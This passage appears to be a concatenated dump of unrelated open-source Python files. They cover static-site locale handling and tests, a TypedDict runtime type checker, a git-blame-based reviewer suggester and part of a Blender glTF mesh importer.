env.filters['CONTENT'] = jinja2_getcontent
env.filters['DATA'] = jinja2_getitem
env.filters['MD'] = jinja2_getmetadata
env.filters['FRAGMENTS'] = jinja2_fragments
env.filters['MC_PAGENAME'] = jinja2_multicast_pagename
env.filters['PAGE_URL'] = jinja2_other_lang_URL
env.filters['TR'] = jinja2_translate
env.filters['LINK_TARGET'] = jinja2_linktarget
env.filters['TARGET_PAGE'] = jinja2_targetpage
env.filters['MARKDOWNIFY'] = jinja2_markdownify
env.filters['SPLIT'] = jinja2_split
env.filters['LOWER'] = jinja2_lower
env.filters['UPPER'] = jinja2_upper
env.filters['basename'] = jinja2_filepath_basename
env.filters['ext'] = jinja2_filepath_ext
templ = env.get_template("")
try:
result = templ.render() # tmpl.render(metadata)
except jinja2.exceptions.TemplateNotFound:
# TEST CODE to be removed...
print(os.getcwd())
print(os.path.abspath(os.getcwd()))
assert False
return result
```
#### File: jecki/SchnelleSeite/locale_strings.py
```python
import os
fourletter = [
"aa_DJ", "aa_ER", "aa_ET", "ae_CH", "af_ZA", "ag_IN", "ai_IN", "ak_GH",
"ak_TW", "al_ET", "am_ET", "an_ES", "an_TW", "ap_AN", "ap_AW", "ap_CW",
"ar_AE", "ar_BH", "ar_DZ", "ar_EG", "ar_IN", "ar_IQ", "ar_JO", "ar_KW",
"ar_LB", "ar_LY", "ar_MA", "ar_OM", "ar_QA", "ar_SA", "ar_SD", "ar_SS",
"ar_SY", "ar_TN", "ar_YE", "as_IN", "at_IN", "az_AZ", "be_BY", "bg_BG",
"bn_BD", "bn_IN", "bo_CN", "bo_IN", "br_FR", "bs_BA", "ca_AD", "ca_ES",
"ca_FR", "ca_IT", "cs_CZ", "cv_RU", "cy_GB", "da_DK", "de_AT", "de_BE",
"de_CH", "de_DE", "de_LU", "ds_DE", "ds_NL", "dv_MV", "dz_BT", "el_CY",
"el_GR", "em_ZM", "en_AG", "en_AU", "en_BW", "en_CA", "en_DK", "en_GB",
"en_HK", "en_IE", "en_IN", "en_NG", "en_NZ", "en_PH", "en_SG", "en_US",
"en_ZA", "en_ZM", "en_ZW", "er_DZ", "er_MA", "es_AR", "es_BO", "es_CL",
"es_CO", "es_CR", "es_CU", "es_DO", "es_EC", "es_ES", "es_GT", "es_HN",
"es_MX", "es_NI", "es_PA", "es_PE", "es_PR", "es_PY", "es_SV", "es_US",
"es_UY", "es_VE", "et_EE", "eu_ES", "ez_ER", "ez_ET", "fa_IR", "ff_SN",
"fi_FI", "fo_FO", "fr_BE", "fr_CA", "fr_CH", "fr_FR", "fr_LU", "fy_DE",
"fy_NL", "ga_IE", "gd_GB", "gl_ES", "gu_IN", "gv_GB", "ha_NG", "he_IL",
"he_NP", "hi_IN", "hn_MX", "ho_IN", "hr_HR", "hr_RU", "hs_CA", "ht_HT",
"hu_HU", "hy_AM", "ia_FR", "id_ET", "id_ID", "ig_ER", "ig_NG", "ij_IT",
"ik_CA", "il_PH", "is_IS", "it_CH", "it_IT", "iu_CA", "iu_NU", "iu_NZ",
"iw_IL", "ja_JP", "ka_GE", "kk_KZ", "kl_GL", "km_KH", "kn_IN", "ko_KR",
"ks_IN", "ku_TR", "kw_GB", "ky_KG", "lb_LU", "lg_UG", "li_BE", "li_NL",
"lo_LA", "lt_LT", "lv_LV", "mg_MG", "mi_NZ", "mk_MK", "ml_IN", "mn_MN",
"mn_TW", "mr_IN", "ms_MY", "mt_MT", "my_MM", "nb_NO", "ne_IN", "ne_NP",
"ni_IN", "nl_AW", "nl_BE", "nl_NL", "nm_US", "nn_NO", "np_IN", "nr_ZA",
"oc_FR", "oi_IN", "ok_IN", "om_ET", "om_KE", "or_IN", "os_RU", "pa_IN",
"pa_PK", "pl_PL", "ps_AF", "pt_BR", "pt_PT", "rh_UA", "ro_RO", "ru_RU",
"ru_UA", "rw_RW", "rx_IN", "sa_IN", "sb_DE", "sb_PL", "sc_IT", "sd_IN",
"se_NO", "si_LK", "sk_SK", "sl_SI", "so_DJ", "so_ET", "so_KE", "so_SO",
"so_ZA", "sq_AL", "sq_MK", "sr_ME", "sr_RS", "ss_ZA", "st_ES", "st_ZA",
"sv_FI", "sv_SE", "sw_KE", "sw_TZ", "ta_IN", "ta_LK", "te_IN", "tg_TJ",
"th_TH", "ti_ER", "ti_ET", "tk_TM", "tl_PH", "tn_ZA", "tr_CY", "tr_TR",
"ts_ZA", "tt_RU", "ue_HK", "ug_CN", "uk_UA", "ur_IN", "ur_IT", "ur_PK",
"uz_PE", "uz_UZ", "ve_ZA", "vi_VN", "wa_BE", "wo_SN", "xh_ZA", "yc_PE",
"yi_US", "yn_ER", "yo_NG", "zh_CN", "zh_HK", "zh_SG", "zh_TW", "zl_PL",
"zu_ZA"
]
fourletter_set = set(fourletter)
twoletter = [
"AA", "AE", "AF", "AG", "AI", "AK", "AL", "AM", "AN", "AP", "AR", "AS",
"AT", "AZ", "BE", "BG", "BN", "BO", "BR", "BS", "CA", "CS", "CV", "CY",
"DA", "DE", "DS", "DV", "DZ", "EL", "EM", "EN", "ER", "ES", "ET", "EU",
"EZ", "FA", "FF", "FI", "FO", "FR", "FY", "GA", "GD", "GL", "GU", "GV",
"HA", "HE", "HI", "HN", "HO", "HR", "HS", "HT", "HU", "HY", "IA", "ID",
"IG", "IJ", "IK", "IL", "IS", "IT", "IU", "IW", "JA", "KA", "KK", "KL",
"KM", "KN", "KO", "KS", "KU", "KW", "KY", "LB", "LG", "LI", "LO", "LT",
"LV", "MG", "MI", "MK", "ML", "MN", "MR", "MS", "MT", "MY", "NB", "NE",
"NI", "NL", "NM", "NN", "NP", "NR", "OC", "OI", "OK", "OM", "OR", "OS",
"PA", "PL", "PS", "PT", "RH", "RO", "RU", "RW", "RX", "SA", "SB", "SC",
"SD", "SE", "SI", "SK", "SL", "SO", "SQ", "SR", "SS", "ST", "SV", "SW",
"TA", "TE", "TG", "TH", "TI", "TK", "TL", "TN", "TR", "TS", "TT", "UE",
"UG", "UK", "UR", "UZ", "VE", "VI", "WA", "WO", "XH", "YC", "YI", "YN",
"YO", "ZH", "ZL", "ZU"
]
twoletter_set = set(twoletter)
class LocaleError(Exception):
def __init__(self, locale_str):
Exception.__init__(self, "%s is not a valid locale" % locale_str)
def valid_locale(locale_str, raise_error=False):
"""Returns True if locale_str represents a valid locale. Otherwise,
returns False or raises an error depending on raise_error.
"""
if (locale_str in fourletter_set or locale_str in twoletter_set or
locale_str == 'ANY'):
return True
else:
if raise_error:
raise LocaleError(locale_str)
return False
def narrow_match(requested, available):
"""Finds the best match for the requested language in a set of available
languages.
Raises a KeyError if no match was found.
Raises a ValueError if no languages are available at all.
"""
assert requested == 'ANY' or len(requested) in [2, 5], \
str(requested) + " is not a valid language code!"
if not available:
raise ValueError("No variants available!")
if requested in available:
return requested
if 'ANY' in available:
return 'ANY'
if requested == 'ANY':
av_list = list(available)
av_list.sort()
return av_list[0]
if len(requested) > 2:
reduced_requested = requested[0:2].upper()
reduced_available = {av[0:2].upper(): av for av in available
if av != 'ANY'}
if reduced_requested in reduced_available:
return reduced_available[reduced_requested]
raise KeyError("No match for {0!s} in {1!s}".format(requested, available))
def match(requested, available, substitution_list):
"""Finds the best match for the requested language in a set of available
languages, but allows to pick a substitute if not match was found.
Raises a KeyError if not even an item from the substitution list is matches
(narrowly) the available languages.
"""
try:
return narrow_match(requested, available)
except KeyError:
for substitute in substitution_list:
try:
return narrow_match(substitute, available)
except KeyError:
pass
raise KeyError("No match found for {0!s} or any of {1!s} in {2!s}".format(
requested, substitution_list, available))
def get_locale(name):
"""Retrieve locale information from a file or directory name.
Parameters:
name(str): file or directory basename (i.e. without any extensions)
Returns:
locale information (string) or empty string if the name does not
contain any locale information
Raises:
LocaleError
"""
L = len(name)
if L > 4 and name[-4:].upper() == "_ANY":
return 'ANY'
if L > 6 and name[-6] == "_" and name[-3] == "_":
lc = name[-5:]
if lc in fourletter_set:
return lc
elif name[-5:-3].islower() and name[-2:].isupper():
raise LocaleError("%s in file %s" % (lc, name))
if L > 3 and name[-3] == "_":
lc = name[-2:]
if lc in twoletter_set:
return lc
elif lc.isalpha():
raise LocaleError("%s in file %s" % (lc, name))
return ''
def extract_locale(filepath):
"""Extracts locale information from filename or parent directory.
Returns locale string or ''.
Locale information is assumed to reside at the end of the basename of the
file, right before the extension. It must either have the form "_xx_XX" or
"_XX", eg. "_de_DE" or simply "_DE", and represent a valid locale.
If no locale information is found in the file name the names of the parent
directory are checked inward out for locale information.
An error is reported, if there appears to be locale information
but if it is malformed.
An empty string is returned if no (intended) locale information seems to be
present in the filename or any of the parent directories' names.
"""
parent, path = os.path.split(filepath)
while path:
pos = path.rfind('.')
basename = path[:pos] if pos >= 0 else path
locale = get_locale(basename)
if locale:
return locale
parent, path = os.path.split(parent)
return ''
def remove_locale(name):
"""Returns file or directory name with locale information removed.
"""
assert name.find(os.path.sep) == -1
pos = name.rfind(".")
basename = name[:pos] if pos >= 0 else name
try:
locale = get_locale(basename)
if locale:
return (basename[:-len(locale) - 1] +
(name[pos:] if pos >= 0 else ""))
except LocaleError:
pass
return name
```
#### File: SchnelleSeite/tests/test_loader.py
```python
import io
import os
#import sys
import unittest
import loader
class TestLoader(unittest.TestCase):
def loadSnippet(self, snippet, injected_metadata={'basename': 'loadertest'}):
file_name = "testdata/loadertest.txt"
with open(file_name, "w") as f, \
io.StringIO(snippet) as g:
for line in g:
f.write(line.lstrip())
result = loader.load(file_name, injected_metadata=injected_metadata)
os.remove(file_name)
return result
def tearDown(self):
unittest.TestCase.tearDown(self)
if os.path.exists("testdata/loadertest.txt"):
os.remove("testdata/loadertest.txt")
def test_boundary_cases(self):
snp1 = "+++\na: 1\nlanguage: ANY\n+++\ninhalt\n"
res1 = {
'ANY': {'metadata': {'language': 'ANY', 'a': 1,
'basename': 'loadertest'},
'content': "inhalt\n"}}
# leading and trailing empty lines
self.assertEqual(
self.loadSnippet("\n \n\n" + snp1 + " \n \n\n")['loadertest'],
res1)
# additional empty lines
snp2 = snp1.replace("\n", "\n \n\n \n")
self.assertEqual(self.loadSnippet(snp2)['loadertest'], res1)
def test_zero_headers(self):
res = {'ANY': {'metadata': {'language': 'ANY',
'basename': 'loadertest'},
'content': "inhalt"}}
injected_metadata = {'language': 'ANY', 'basename': 'loadertest'}
self.assertEqual(self.loadSnippet("inhalt",
injected_metadata)['loadertest'],
res)
res['ANY']['content'] = "inhalt\n"
self.assertEqual(
self.loadSnippet("\ninhalt\n\n", injected_metadata)['loadertest'],
res)
def test_empty_header(self):
snp = "+++\nlanguage: DE\n+++\ninhalt"
res = {'DE': {'metadata': {'language': 'DE', 'basename': 'loadertest'},
'content': "inhalt"}}
self.assertEqual(self.loadSnippet(snp)['loadertest'], res)
def test_single_header(self):
snp1 = "+++\nlanguage: ANY\na: 1\n+++\nInhalt\n"
res1 = {
'ANY': {'metadata': {'language': 'ANY', 'a': 1,
'basename': 'loadertest'},
'content': "Inhalt\n"}}
self.assertEqual(self.loadSnippet(snp1)['loadertest'], res1)
# def test_multiple_headers(self):
# pass
def test_bad_headers(self):
for snp in ["+++", "\n+++\n", "a\n+++\nb: 1", "\n+++\n+++\n+++"]:
self.assertRaisesRegex(loader.MalformedFile,
loader.MalformedFile.END_MARKER_MISSING,
self.loadSnippet, snp)
def test_empty_files(self):
empty = {'en_US': {'metadata': {'language': 'en_US',
'basename': 'loadertest'},
'content': ""}}
self.assertEqual(
self.loadSnippet("", empty['en_US']['metadata'])['loadertest'],
empty)
self.assertEqual(
self.loadSnippet("+++\nlanguage: en_US\n+++\n")['loadertest'],
empty)
self.assertRaisesRegex(loader.MalformedFile,
loader.MalformedFile.LANGUAGE_INFO_MISSING,
self.loadSnippet, "+++\n+++\n+++\n+++\n")
def test_multiple_blocks_of_same_lang_exceptions(self):
snp = ("+++\nlanguage: DE\n+++\nInhalt DE\n"
"+++\nlanguage: EN\n+++\nInhalt EN\n"
"+++\nlanguage: DE\n+++\n2. Inhalt DE!!!\n")
self.assertRaisesRegex(
loader.MalformedFile,
loader.MalformedFile.MULTIPLE_BLOCKS_OF_SAME_LANGUAGE,
self.loadSnippet, snp)
def test_load_transtable(self):
transtable_csv = ("EN;DE\n"
"English;Englisch\n"
"German;Deutsch\n"
"\n\n")
transtable = loader.csv_loader(transtable_csv, {})
result = loader.load_transtable(transtable, {'item': 'test'})
self.assertEqual(result['EN']['metadata']['item'], 'test')
self.assertEqual(result['DE']['metadata']['item'], 'test')
self.assertEqual(result['DE']['content']['English'], "Englisch")
self.assertEqual(result['DE']['content']['German'], "Deutsch")
self.assertEqual(result['EN']['content']['English'], "English")
self.assertEqual(result['EN']['content']['German'], "German")
# if __name__ == "__main__":
# sys.path.append(
# os.path.split(os.path.dirname(os.path.abspath(sys.argv[0])))[0])
# import loader
# unittest.main()
```
#### File: SchnelleSeite/tests/test_locale_strings.py
```python
import os
import sys
import unittest
from locale_strings import *
# import locale_strings --> see below
class TestLocaleStrings(unittest.TestCase):
def test_narrow_match(self):
self.assertEqual(narrow_match('ANY', {'ANY'}), 'ANY')
def test_get_locale(self):
self.assertEqual(get_locale("name_ANY"), 'ANY')
self.assertEqual(get_locale("name_en_US"), 'en_US')
self.assertEqual(get_locale("name_DE"), 'DE')
self.assertEqual(get_locale("name"), '')
self.assertRaises(LocaleError, get_locale, "name_XY")
self.assertRaises(LocaleError, get_locale, "name_De")
self.assertRaises(LocaleError, get_locale, "name_ex_US")
self.assertRaises(LocaleError, get_locale, "name_EN_US")
# assume no mistake in the following case
self.assertEqual(get_locale("name_ABC"), '')
def test_remove_locale(self):
self.assertEqual(remove_locale("test_ANY.txt"), "test.txt")
self.assertEqual(remove_locale("test.txt"), "test.txt")
self.assertEqual(remove_locale("test"), "test")
self.assertEqual(remove_locale("test_en_US.txt"), "test.txt")
self.assertEqual(remove_locale("test_DE"), "test")
# don't remove locales if filename only consists of a locale
self.assertEqual(remove_locale("_EN.txt"), "_EN.txt")
# raise an error for false locales
# errors will only be raised on get_locale, but not on remove_locale, any more
# self.assertRaises(LocaleError, remove_locale, "test_US.txt")
def test_extract_locale(self):
self.assertEqual(extract_locale("alpha/beta_DE/gamma.txt"), "DE")
self.assertEqual(extract_locale("alpha_DE/beta_EN/gamma.txt"), "EN")
self.assertEqual(extract_locale("alpha/beta/gamma_DE.txt"), "DE")
self.assertEqual(extract_locale("alpha/beta/gamma.txt"), "")
self.assertEqual(extract_locale("alpha/beta_DE/gamma_ANY.txt"), "ANY")
# if __name__ == "__main__":
# sys.path.append(
# os.path.split(os.path.dirname(os.path.abspath(sys.argv[0])))[0])
# from locale_strings import *
# unittest.main()
```
|
{
"source": "jecki/ts2python",
"score": 3
}
|
#### File: ts2python/demo/README_example.py
```python
try:
from ts2python.json_validation import TypedDict, type_check
except ImportError:
# seems that this script has been called from the git
# repository without ts2python having been installed
import sys, os
sys.path.append(os.path.join('..', '..'))
from ts2python.json_validation import TypedDict, type_check
class Position(TypedDict, total=True):
line: int
character: int
class Range(TypedDict, total=True):
start: Position
end: Position
@type_check
def middle_line(rng: Range) -> Position:
line = (rng['start']['line'] + rng['end']['line']) // 2
character = 0
return Position(line=line, character=character)
rng = {'start': {'line': 1, 'character': 1},
'end': {'line': 8, 'character': 17}}
assert middle_line(rng) == {'line': 4, 'character': 0}
malformed_rng = {'start': 1, 'end': 8}
try:
middle_line(malformed_rng)
except TypeError as e:
print(e)
# expected:
# Parameter "rng" of function "middle_line" failed the type-check, because:
# Type error(s) in dictionary of type <class '__main__.Range'>:
# Field start: '1' is not of <class '__main__.Position'>, but of type <class 'int'>
# Field end: '8' is not of <class '__main__.Position'>, but of type <class 'int'>
```
#### File: ts2python/ts2python/json_validation.py
```python
from enum import Enum, IntEnum
import functools
import sys
from typing import Union, List, Tuple, Optional, Dict, Any, \
Generic, TypeVar, Iterable, Callable, get_type_hints
try:
from typing_extensions import GenericMeta, \
ClassVar, Final, Protocol, NoReturn
except ImportError:
from .typing_extensions import GenericMeta, \
ClassVar, Final, Protocol, NoReturn
# try:
# from typing import ForwardRef, _GenericAlias, _SpecialForm
# except ImportError:
# from typing import _ForwardRef # Python 3.6 compatibility
# ForwardRef = _ForwardRef
# _GenericAlias = GenericMeta
# _SpecialForm = Any
# try:
# from typing_extensions import get_origin
# except ImportError:
# def get_origin(typ):
# try:
# return typ.__origin__
# except AttributeError:
# return Generic
from .typeddict_shim import TypedDict, GenericTypedDict, _TypedDictMeta, get_origin
__all__ = ['validate_type', 'type_check', 'validate_uniform_sequence']
def strdata(data: Any) -> str:
datastr = str(data)
return datastr[:10] + '...' if len(datastr) > 10 else datastr
def validate_enum(val: Any, typ: Enum):
# if not any(member.value == val for member in typ.__members__.values()):
# raise ValueError(f"{val} is not contained in enum {typ}")
if not hasattr(typ, '__value_set__'):
typ.__value_set__ = {member.value for member in typ.__members__.values()}
if val not in typ.__value_set__:
raise ValueError(f"{val} is not contained in enum {typ}")
def validate_type(val: Any, typ):
"""Raises a TypeError if value `val` is not of type `typ`.
In particualr, `validate_type()` can be used to validate
dictionaries against TypedDict-types and, more general,
to validate JSON-data.
Examples::
>>> validate_type(1, int)
>>> validate_type(['alpha', 'beta', 'gamma'], List[str])
>>> class Position(TypedDict, total=True):
... line: int
... character: int
>>> import json
>>> json_data = json.loads('{"line": 1, "character": 1}')
>>> validate_type(json_data, Position)
>>> bad_json_data = json.loads('{"line": 1, "character": "A"}')
>>> try:
... validate_type(bad_json_data, Position)
... except TypeError as e:
... print(e)
Type error(s) in dictionary of type <class 'json_validation.Position'>:
Field character: 'A' is not a <class 'int'>, but a <class 'str'>
"""
if isinstance(typ, _TypedDictMeta):
if not isinstance(val, Dict):
raise TypeError(f"{val} is not even a dictionary")
validate_TypedDict(val, typ)
elif hasattr(typ, '__args__'):
validate_compound_type(val, typ)
else:
if not isinstance(val, typ):
if issubclass(typ, Enum): # and isinstance(val, (int, str)):
validate_enum(val, typ)
else:
raise TypeError(f"{val} is not of type {typ}")
def validate_uniform_sequence(sequence: Iterable, item_type):
"""Ensures that every item in a given sequence is of the same particular
type. Example::
>>> validate_uniform_sequence((1, 5, 3), int)
>>> try:
... validate_uniform_sequence(['a', 'b', 3], str)
... except TypeError as e:
... print(e)
3 is not of type <class 'str'>
:param sequence: An iterable to be validated
:param item_type: The expected type of all items the iterable `sequence` yields.
"""
# assert not isinstance(item_type, str), f'Unresolved type name or forward reference for {item_type}!'
if isinstance(item_type, _TypedDictMeta):
for val in sequence:
if not isinstance(val, Dict):
raise TypeError(f"{val} is not of type {item_type}")
validate_TypedDict(val, item_type)
elif hasattr(item_type, '__args__'):
for val in sequence:
validate_compound_type(val, item_type)
else:
for val in sequence:
if not isinstance(val, item_type):
raise TypeError(f"{val} is not of type {item_type}")
def validate_compound_type(value: Any, T):
"""Validates a value against a compound type like
List[str], Tuple[int, ...], Dict[str, int]. Generally, compound types
are types with arguments. Returns None, if the validation was
successful, raises a TypeError if not. Example::
>>> validate_compound_type((1, 5, 3), Tuple[int, ...])
>>> try:
... validate_compound_type({1: 'a', 1.5: 'b'}, Dict[int, str])
... except TypeError as e:
... print(e)
1.5 is not of type <class 'int'>
:param value: the value which shall by validated against the given type
:param T: the type which the value is supposed to represent.
:return: None
:raise: TypeError if value is not of compound type T.
ValueError if T is not a compound type.
"""
if not hasattr(T, '__args__'):
raise ValueError(f'{T} is not a compound type.')
if isinstance(value, get_origin(T)):
if isinstance(value, Dict):
assert len(T.__args__) == 2, str(T)
key_type, value_type = T.__args__
validate_uniform_sequence(value.keys(), key_type)
validate_uniform_sequence(value.values(), value_type)
elif isinstance(value, Tuple):
if len(T.__args__) == 2 and T.__args__[-1] is Ellipsis:
validate_uniform_sequence(value, T.__args__[0])
else:
if len(T.__args__) != len(value):
raise TypeError(f"{value} is not of type {T}")
for item, typ in zip(value, T.__args__):
validate_type(item, typ)
else: # assume that value is of type List
if len(T.__args__) != 1:
raise ValueError(f"Unknown compound type {T}")
validate_uniform_sequence(value, T.__args__[0])
else:
raise TypeError(f"{value} is not of type {get_origin(T)}")
def validate_TypedDict(D: Dict, T: _TypedDictMeta):
"""Validates a dictionary against a TypedDict-definition and raises
a TypeError, if any of the following is detected:
- "Unexpeced" keys that have not been defined in the TypedDict.
- "Missing" keys, i.e. keys that have been defined in the TypedDict,
and not been marked as NotRequired/Optional
Types are validated recursively for any contained dictionaries, lists
or tuples. Example::
>>> class Position(TypedDict, total=True):
... line: int
... character: int
>>> validate_TypedDict({'line': 1, 'character': 1}, Position)
>>> p = Position(line=1)
>>> try:
... validate_TypedDict(p, Position)
... except TypeError as e:
... print(e)
Type error(s) in dictionary of type <class 'json_validation.Position'>:
Missing required keys: {'character'}
:param D: the dictionary to be validated
:param T: the assumed TypedDict type of that dictionary
:return: None
:raise: TypeError in case a type error has been detected.
"""
assert isinstance(D, Dict), str(D)
assert isinstance(T, _TypedDictMeta), str(T)
type_errors = []
missing = T.__required_keys__ - D.keys()
if missing:
type_errors.append(f"Missing required keys: {missing}")
unexpected = D.keys() - (T.__required_keys__ | T.__optional_keys__)
if unexpected:
type_errors.append(f"Unexpected keys: {unexpected}")
for field, field_type in get_type_hints(T).items():
if field not in D:
continue
if isinstance(field_type, _TypedDictMeta):
value = D[field]
if isinstance(value, Dict):
validate_TypedDict(value, field_type)
else:
type_errors.append(f"Field {field}: '{strdata(D[field])}' is not of {field_type}, "
f"but of type {type(D[field])}")
elif get_origin(field_type) is Union:
value = D[field]
for union_typ in field_type.__args__:
if isinstance(union_typ, _TypedDictMeta):
if isinstance(value, Dict):
try:
validate_TypedDict(value, union_typ)
break
except TypeError:
pass
elif hasattr(union_typ, '__args__'):
try:
validate_compound_type(value, union_typ)
break
except TypeError:
pass
elif isinstance(value, union_typ):
break
else:
# TODO: bugfix?
type_errors.append(f"Field {field}: '{strdata(D[field])}' is not of {field_type}, "
f"but of type {type(D[field])}")
elif hasattr(field_type, '__args__'):
validate_compound_type(D[field], field_type)
elif isinstance(field_type, TypeVar):
pass # for now
elif not isinstance(D[field], field_type):
if issubclass(field_type, Enum):
validate_enum(D[field], field_type)
else:
type_errors.append(f"Field {field}: '{strdata(D[field])}' is not a {field_type}, "
f"but a {type(D[field])}")
if type_errors:
raise TypeError(f"Type error(s) in dictionary of type {T}:\n"
+ '\n'.join(type_errors))
def type_check(func: Callable, check_return_type: bool = True) -> Callable:
"""Decorator that validates the type of the parameters as well as the
return value of a function against its type annotations during runtime.
Parameters that have no type annotation will be silently ignored by
the type check. Likewise, the return type.
Example::
>>> class Position(TypedDict, total=True):
... line: int
... character: int
>>> class Range(TypedDict, total=True):
... start: Position
... end: Position
>>> @type_check
... def middle_line(rng: Range) -> Position:
... line = (rng['start']['line'] + rng['end']['line']) // 2
... character = 0
... return Position(line=line, character=character)
>>> rng = {'start': {'line': 1, 'character': 1},
... 'end': {'line': 8, 'character': 17}}
>>> middle_line(rng)
{'line': 4, 'character': 0}
>>> malformed_rng = {'start': 1, 'end': 8}
>>> try:
... middle_line(malformed_rng)
... except TypeError as e:
... print(e)
Parameter "rng" of function "middle_line" failed the type-check, because:
Type error(s) in dictionary of type <class 'json_validation.Range'>:
Field start: '1' is not of <class 'json_validation.Position'>, but of type <class 'int'>
Field end: '8' is not of <class 'json_validation.Position'>, but of type <class 'int'>
:param func: The function, the parameters and return value of which shall
be type-checked during runtime.
:return: The decorated function that will raise TypeErrors, if either
at least one of the parameter's or the return value does not
match the annotated types.
"""
arg_names = func.__code__.co_varnames[:func.__code__.co_argcount]
arg_types = get_type_hints(func)
return_type = arg_types.get('return', None)
if return_type is not None: del arg_types['return']
assert arg_types or return_type, \
f'type_check-decorated "{func}" has no type annotations'
@functools.wraps(func)
def guard(*args, **kwargs):
nonlocal arg_names, arg_types, return_type
arg_dict = {**dict(zip(arg_names, args)), **kwargs}
for name, typ in arg_types.items():
try:
validate_type(arg_dict[name], typ)
except TypeError as e:
raise TypeError(
f'Parameter "{name}" of function "{func.__name__}" failed '
f'the type-check, because:\n{str(e)}')
except KeyError as e:
raise TypeError(f'Missing parameter {str(e)} in call of '
f'"{func.__name__}"')
ret = func(*args, **kwargs)
if check_return_type and return_type:
try:
validate_type(ret, return_type)
except TypeError as e:
raise TypeError(
f'Value returned by function "{func.__name__}" failed '
f'the type-check, because: {str(e)}')
return ret
return guard
```
|
{
"source": "JeckLabs/blame-reviewers",
"score": 3
}
|
#### File: blame-reviewers/reviewers/__main__.py
```python
import sh
def get_files_for_blame(diff: str) -> dict:
diff_lines = diff.splitlines()
skipping = 1
searching_filename = 2
searching_chunk = 3
state = skipping
chunks = {}
current_chunk_filename = None
for line in diff_lines:
if state == skipping:
if line[:4] != 'diff':
continue
state = searching_filename
elif state == searching_filename:
if line[:3] != '---':
continue
if line[4:] == '/dev/null':
continue
current_chunk_filename = line[6:]
state = searching_chunk
elif state == searching_chunk:
if line[:2] != '@@':
continue
if current_chunk_filename not in chunks:
chunks[current_chunk_filename] = []
line_numbers = line.split(" ")[1]
(start_line, offset) = map(int, line_numbers[1:].split(","))
chunks[current_chunk_filename].append((start_line, offset))
state = skipping
return chunks
def get_authors_from_blame(blame: str) -> dict:
authors = {}
author_name = "unknown"
for line in blame.splitlines():
if line[0] == "\t":
continue
key, value = line.split(" ", 1)
if key == "author":
author_name = value
continue
if key != "author-mail":
continue
author_email = value[1:].split(">", 1)[0]
if author_email not in authors:
authors[author_email] = {
"count": 0,
"name": author_name,
}
authors[author_email]["count"] += 1
return authors
def add_authors_to_reviewers(reviewers: dict, authors: dict) -> dict:
for author_email, author_info in authors.items():
if author_email not in reviewers:
reviewers[author_email] = {
"name": author_info['name'],
"chunks_count": 0,
"total_count": 0,
}
reviewers[author_email]["chunks_count"] += 1
reviewers[author_email]["total_count"] += author_info["count"]
return reviewers
def main():
git = sh.git.bake("--no-pager")
merge_base = git("merge-base", "master", "HEAD")
merge_base_rev = str(merge_base).strip()
branch_diff_res = git.diff(merge_base_rev + "..", "--no-color")
branch_diff = str(branch_diff_res).strip()
files_for_blame = get_files_for_blame(branch_diff)
reviewers = {}
for filename, lines_info in files_for_blame.items():
for line, offset in lines_info:
print("Blaming %s %s,+%d..." % (filename, line, offset))
blame = git.blame("-L", "%d,+%d" % (line, offset), "--line-porcelain", merge_base_rev, "--", filename)
authors = get_authors_from_blame(blame)
reviewers = add_authors_to_reviewers(reviewers, authors)
print()
reviewers_table = sorted(reviewers.items(), reverse=True, key=lambda x: (x[1]["chunks_count"], x[1]["total_count"]))
for email, reviewer_info in reviewers_table:
print("{name:>25} {:>40} {chunks_count:>5}.{total_count}".format(email, **reviewer_info))
if __name__ == "__main__":
main()
```
|
{
"source": "JeckleCed/glTF-Blender-IO",
"score": 2
}
|
#### File: blender/imp/gltf2_blender_primitive.py
```python
import bpy
from mathutils import Vector
from .gltf2_blender_material import BlenderMaterial
from ..com.gltf2_blender_conversion import loc_gltf_to_blender
from ...io.imp.gltf2_io_binary import BinaryData
class BlenderPrimitive():
"""Blender Primitive."""
def __new__(cls, *args, **kwargs):
raise RuntimeError("%s should not be instantiated" % cls)
@staticmethod
def create(gltf, pyprimitive, verts, edges, faces):
"""Primitive creation."""
pyprimitive.blender_texcoord = {}
current_length = len(verts)
pos = BinaryData.get_data_from_accessor(gltf, pyprimitive.attributes['POSITION'])
if pyprimitive.indices is not None:
indices = BinaryData.get_data_from_accessor(gltf, pyprimitive.indices)
else:
indices = [(i,) for i in range(len(pos))]
pyprimitive.tmp_indices = indices
# Manage only vertices that are in indices tab
indice_equivalents = {}
new_pos = []
new_pos_idx = 0
for i in indices:
if i[0] not in indice_equivalents.keys():
indice_equivalents[i[0]] = new_pos_idx
new_pos.append(pos[i[0]])
new_pos_idx += 1
prim_verts = [loc_gltf_to_blender(vert) for vert in new_pos]
mode = 4 if pyprimitive.mode is None else pyprimitive.mode
prim_edges, prim_faces = BlenderPrimitive.edges_and_faces(mode, indices)
verts.extend(prim_verts)
pyprimitive.vertices_length = len(prim_verts)
edges.extend(
tuple(indice_equivalents[y] + current_length for y in e)
for e in prim_edges
)
faces.extend(
tuple(indice_equivalents[y] + current_length for y in f)
for f in prim_faces
)
# manage material of primitive
if pyprimitive.material is not None:
vertex_color = None
if 'COLOR_0' in pyprimitive.attributes.keys():
vertex_color = 'COLOR_0'
# Create Blender material if needed
if vertex_color is None:
if None not in gltf.data.materials[pyprimitive.material].blender_material.keys():
BlenderMaterial.create(gltf, pyprimitive.material, vertex_color)
else:
if vertex_color not in gltf.data.materials[pyprimitive.material].blender_material.keys():
BlenderMaterial.create(gltf, pyprimitive.material, vertex_color)
return verts, edges, faces
@staticmethod
def edges_and_faces(mode, indices):
"""Converts the indices in a particular primitive mode into standard lists of
edges (pairs of indices) and faces (tuples of CCW indices).
"""
es = []
fs = []
if mode == 0:
# POINTS
pass
elif mode == 1:
# LINES
# 1 3
# / /
# 0 2
es = [
(indices[i][0], indices[i + 1][0])
for i in range(0, len(indices), 2)
]
elif mode == 2:
# LINE LOOP
# 1---2
# / \
# 0-------3
es = [
(indices[i][0], indices[i + 1][0])
for i in range(0, len(indices) - 1)
]
es.append((indices[-1][0], indices[0][0]))
elif mode == 3:
# LINE STRIP
# 1---2
# / \
# 0 3
es = [
(indices[i][0], indices[i + 1][0])
for i in range(0, len(indices) - 1)
]
elif mode == 4:
# TRIANGLES
# 2 3
# / \ / \
# 0---1 4---5
fs = [
(indices[i][0], indices[i + 1][0], indices[i + 2][0])
for i in range(0, len(indices), 3)
]
elif mode == 5:
# TRIANGLE STRIP
# 0---2---4
# \ / \ /
# 1---3
def alternate(i, xs):
even = i % 2 == 0
return xs if even else (xs[0], xs[2], xs[1])
fs = [
alternate(i, (indices[i][0], indices[i + 1][0], indices[i + 2][0]))
for i in range(0, len(indices) - 2)
]
elif mode == 6:
